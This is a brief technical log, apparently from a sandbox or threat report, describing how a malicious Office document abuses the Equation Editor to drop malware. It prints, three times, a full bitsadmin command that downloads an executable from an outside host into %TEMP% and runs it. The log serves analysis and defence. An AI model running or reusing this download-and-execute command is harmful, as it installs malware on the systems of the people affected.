Technical Information
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer Or /priority foreground https://www.gorontula.com/wp-admin/includes/_output45DBD60.exe %TEMP%\A.exe && start %TEMP%\A.exe
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{813bbe3c-4390-47f7-ab0a-3ba6ae576237}.tmp
- 'go###tula.com':443
- DNS ASK go###tula.com
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer Or /priority foreground https://www.gorontula.com/wp-admin/includes/_output45DBD60.exe %TEMP%\A.exe && start %TEMP%\A.exe' (with hidden window)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer Or /priority foreground https://www.gorontula.com/wp-admin/includes/_output45DBD60.exe %TEMP%\A.exe
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding